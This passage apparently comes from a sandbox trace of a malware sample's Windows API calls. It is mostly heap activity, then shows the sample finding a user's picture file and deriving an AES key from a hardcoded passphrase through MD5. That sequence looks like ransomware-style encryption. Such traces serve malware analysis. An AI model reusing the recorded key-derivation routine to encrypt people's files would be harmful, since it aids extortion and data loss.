HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a298 [0091.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0091.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0091.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0091.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0091.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0091.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0091.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0091.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0091.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0091.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0091.180] FreeLibrary (hLibModule=0x772d0000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0091.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.182] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.182] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.183] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0091.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a298 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0091.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0091.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0091.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0091.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0091.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0091.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0091.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0091.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0091.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0091.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0091.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0091.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0091.186] CloseHandle (hObject=0x258) returned 1 [0091.186] FreeLibrary (hLibModule=0x772d0000) returned 1 [0091.186] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0091.186] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\YwIpia.gif", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77c7a780, ftCreationTime.dwHighDateTime=0x1d5ed1f, ftLastAccessTime.dwLowDateTime=0xa20a2780, ftLastAccessTime.dwHighDateTime=0x1d5eb16, ftLastWriteTime.dwLowDateTime=0xa20a2780, ftLastWriteTime.dwHighDateTime=0x1d5eb16, nFileSizeHigh=0x0, nFileSizeLow=0xfa89, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="YwIpia.gif", cAlternateFileName="")) returned 0x41ac2c0 [0091.186] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0091.187] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0091.187] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.187] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0091.187] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0091.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0091.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0091.187] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0091.188] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0091.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0091.188] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0091.188] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0091.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0091.188] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.188] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0091.188] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca5c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0091.189] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0091.189] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0091.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca730, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0091.189] CryptHashData (hHash=0x41ac6c0, pbData=0x17e27e8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0091.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.189] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0091.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca748, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0091.189] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac000) returned 1 [0091.190] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.190] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0091.190] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 